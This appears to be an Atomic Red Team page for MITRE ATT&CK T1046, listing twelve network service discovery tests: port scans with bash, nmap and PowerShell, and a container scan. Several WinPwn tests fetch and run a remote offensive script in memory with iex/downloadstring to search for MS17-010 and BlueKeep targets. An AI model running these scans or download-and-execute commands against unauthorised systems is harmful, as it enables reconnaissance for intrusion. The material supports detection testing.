# T1046 - Network Service Discovery
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1046)
<blockquote>

Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port, vulnerability, and/or wordlist scans using tools that are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May 2021)   

Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.

Within macOS environments, adversaries may use the native Bonjour application to discover services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon automatically registers and advertises a host’s registered services on the network. For example, adversaries can use a mDNS query (such as <code>dns-sd -B _ssh._tcp .</code>) to find other systems broadcasting the ssh service.(Citation: apple doco bonjour description)(Citation: macOS APT Activity Bradley)

</blockquote>

## Atomic Tests

- [Atomic Test #1 - Port Scan](#atomic-test-1---port-scan)

- [Atomic Test #2 - Port Scan Nmap](#atomic-test-2---port-scan-nmap)

- [Atomic Test #3 - Port Scan NMap for Windows](#atomic-test-3---port-scan-nmap-for-windows)

- [Atomic Test #4 - Port Scan using python](#atomic-test-4---port-scan-using-python)

- [Atomic Test #5 - WinPwn - spoolvulnscan](#atomic-test-5---winpwn---spoolvulnscan)

- [Atomic Test #6 - WinPwn - MS17-10](#atomic-test-6---winpwn---ms17-10)

- [Atomic Test #7 - WinPwn - bluekeep](#atomic-test-7---winpwn---bluekeep)

- [Atomic Test #8 - WinPwn - fruit](#atomic-test-8---winpwn---fruit)

- [Atomic Test #9 - Network Service Discovery for Containers](#atomic-test-9---network-service-discovery-for-containers)

- [Atomic Test #10 - Port-Scanning /24 Subnet with PowerShell](#atomic-test-10---port-scanning-24-subnet-with-powershell)

- [Atomic Test #11 - Remote Desktop Services Discovery via PowerShell](#atomic-test-11---remote-desktop-services-discovery-via-powershell)

- [Atomic Test #12 - Port Scan using nmap (Port range)](#atomic-test-12---port-scan-using-nmap-port-range)


<br/>

## Atomic Test #1 - Port Scan
Scan ports to check for listening ports.

Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout.

**Supported Platforms:** Linux, macOS


**auto_generated_guid:** 68e907da-2539-48f6-9fc9-257a78c05540





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| host | Host to scan. | string | 192.168.1.1|


#### Attack Commands: Run with `bash`! 


```bash
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
```






<br/>
<br/>

## Atomic Test #2 - Port Scan Nmap
Scan ports to check for listening ports with Nmap.
Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.

**Supported Platforms:** Linux, macOS


**auto_generated_guid:** 515942b0-a09f-4163-a7bb-22fefb6f185f





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| host | Host to scan. | string | 192.168.1.1|
| port | Ports to scan. | string | 80|
| network_range | Network Range to Scan. | string | 192.168.1.0/24|


#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 


```sh
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
```




#### Dependencies:  Run with `sh`!
##### Description: Check if nmap command exists on the machine
##### Check Prereq Commands:
```sh
if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```sh
(which yum && yum -y install epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)||(which pkg && pkg install -y nmap)
```
##### Description: Check if nc command exists on the machine
##### Check Prereq Commands:
```sh
if [ -x "$(command -v nc)" ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```sh
(which yum && yum -y install epel-release nc)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y netcat)||(which pkg && pkg install -y netcat)
```
##### Description: Check if telnet command exists on the machine
##### Check Prereq Commands:
```sh
if [ -x "$(command -v telnet)" ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```sh
(which yum && yum -y install epel-release telnet)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y telnet)
```




<br/>
<br/>

## Atomic Test #3 - Port Scan NMap for Windows
Scan ports to check for listening ports for the local host 127.0.0.1

**Supported Platforms:** Windows


**auto_generated_guid:** d696a3cb-d7a8-4976-8eb5-5af4abf2e3df





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| nmap_url | NMap installer download URL | url | https://nmap.org/dist/nmap-7.80-setup.exe|
| host_to_scan | The host to scan with NMap | string | 127.0.0.1|


#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 


```powershell
nmap #{host_to_scan}
```




#### Dependencies:  Run with `powershell`!
##### Description: NMap must be installed
##### Check Prereq Commands:
```powershell
if (cmd /c "nmap 2>nul") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nmap-7.80-setup.exe" #{nmap_url}
Start-Process "PathToAtomicsFolder\..\ExternalPayloads\nmap-7.80-setup.exe" /S
```




<br/>
<br/>

## Atomic Test #4 - Port Scan using python
Scan ports to check for listening ports with python

**Supported Platforms:** Windows


**auto_generated_guid:** 6ca45b04-9f15-4424-b9d3-84a217285a5c





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| host_ip | Host to scan. | string | 127.0.0.1|
| filename | Location of the project file | path | PathToAtomicsFolder&#92;T1046&#92;src&#92;T1046.py|


#### Attack Commands: Run with `powershell`! 


```powershell
python "#{filename}" -i #{host_ip}
```




#### Dependencies:  Run with `powershell`!
##### Description: Check if python exists on the machine
##### Check Prereq Commands:
```powershell
if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
```




<br/>
<br/>

## Atomic Test #5 - WinPwn - spoolvulnscan
Start MS-RPRN RPC Service Scan using spoolvulnscan function of WinPwn

**Supported Platforms:** Windows


**auto_generated_guid:** 54574908-f1de-4356-9021-8053dd57439a






#### Attack Commands: Run with `powershell`! 


```powershell
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
```






<br/>
<br/>

## Atomic Test #6 - WinPwn - MS17-10
Search for MS17-10 vulnerable Windows Servers in the domain using powerSQL function of WinPwn

**Supported Platforms:** Windows


**auto_generated_guid:** 97585b04-5be2-40e9-8c31-82157b8af2d6






#### Attack Commands: Run with `powershell`! 


```powershell
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
```






<br/>
<br/>

## Atomic Test #7 - WinPwn - bluekeep
Search for bluekeep vulnerable Windows Systems in the domain using bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds in testing on a small domain).

**Supported Platforms:** Windows


**auto_generated_guid:** 1cca5640-32a9-46e6-b8e0-fabbe2384a73






#### Attack Commands: Run with `powershell`! 


```powershell
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
```






<br/>
<br/>

## Atomic Test #8 - WinPwn - fruit
Search for potentially vulnerable web apps (low hanging fruits) using fruit function of WinPwn

**Supported Platforms:** Windows


**auto_generated_guid:** bb037826-cbe8-4a41-93ea-b94059d6bb98






#### Attack Commands: Run with `powershell`! 


```powershell
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
```






<br/>
<br/>

## Atomic Test #9 - Network Service Discovery for Containers
Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and vulnerability scans in order to obtain this information.

**Supported Platforms:** Containers


**auto_generated_guid:** 06eaafdb-8982-426e-8a31-d572da633caa






#### Attack Commands: Run with `sh`! 


```sh
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
```

#### Cleanup Commands:
```sh
docker stop t1046_container
docker rmi -f t1046
```



#### Dependencies:  Run with `sh`!
##### Description: Verify docker is installed.
##### Check Prereq Commands:
```sh
which docker
```
##### Get Prereq Commands:
```sh
if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi
```
##### Description: Verify docker service is running.
##### Check Prereq Commands:
```sh
sudo systemctl status docker  --no-pager
```
##### Get Prereq Commands:
```sh
sudo systemctl start docker
```




<br/>
<br/>

## Atomic Test #10 - Port-Scanning /24 Subnet with PowerShell
Scanning common ports in a /24 subnet. If no IP address for the target subnet is specified the test tries to determine the attacking machine's "primary" IPv4 address first and then scans that address with a /24 netmask.
The connection attempts to use a timeout parameter in milliseconds to speed up the scan. Please note the atomic might not print any output until the scans are completed.

**Supported Platforms:** Windows


**auto_generated_guid:** 05df2a79-dba6-4088-a804-9ca0802ca8e4





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ip_address | IP-Address within the target subnet. Default is empty and script tries to determine local IP address of attacking machine. A comma separated list of targe IPs is also accepted (useful to simulate a wider scan while only scanning key host e.g., honeypots) | string | |
| port_list | Comma separated list of ports to scan | string | 445, 3389|
| timeout_ms | Connection timeout in milliseconds | string | 200|


#### Attack Commands: Run with `powershell`! 


```powershell
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
    $ip_list = $ipAddr -split ","
    $ip_list = $ip_list.ForEach({ $_.Trim() })
    Write-Host "[i] IP Address List: $ip_list"

    $ports = #{port_list}

    foreach ($ip in $ip_list) {
        foreach ($port in $ports) {
            Write-Host "[i] Establishing connection to: $ip : $port"
            try {
                $tcp = New-Object Net.Sockets.TcpClient
                $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
            } catch {}
            if ($tcp.Connected) {
                $tcp.Close()
                Write-Host "Port $port is open on $ip"
            }
        }
    }
} elseif ($ipAddr -notlike "*,*") {
    if ($ipAddr -eq "") {
        # Assumes the "primary" interface is shown at the top
        $interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
        Write-Host "[i] Using Interface $interface"
        $ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
    }
    Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
    $subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
    # Always assumes /24 subnet
    Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"

    $ports = #{port_list}
    $subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }

    foreach ($ip in $subnetIPs) {
        foreach ($port in $ports) {
            try {
                $tcp = New-Object Net.Sockets.TcpClient
                $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
            } catch {}
            if ($tcp.Connected) {
                $tcp.Close()
                Write-Host "Port $port is open on $ip"
            }
        }
    }
} else {
    Write-Host "[Error] Invalid Inputs"
    exit 1
}
```






<br/>
<br/>

## Atomic Test #11 - Remote Desktop Services Discovery via PowerShell
Availability of remote desktop services can be checked using get- cmdlet of PowerShell

**Supported Platforms:** Windows


**auto_generated_guid:** 9e55750e-4cbf-4013-9627-e9a045b541bf






#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 


```powershell
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
```






<br/>
<br/>

## Atomic Test #12 - Port Scan using nmap (Port range)
Scan multiple ports to check for listening ports with nmap

**Supported Platforms:** Linux, macOS


**auto_generated_guid:** 0d5a2b03-3a26-45e4-96ae-89485b4d1f97





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| host | Host(s) to scan. | string | 127.0.0.1|
| port_range | Port range(s) to scan. | string | 0-65535|


#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 


```sh
nmap -Pn -sV -p #{port_range} #{host}
```




#### Dependencies:  Run with `sh`!
##### Description: Check if nmap command exists on the machine
##### Check Prereq Commands:
```sh
if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```sh
(which yum && yum -y install epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)||(which pkg && pkg install -y nmap)||(which brew && brew install nmap)
```




<br/>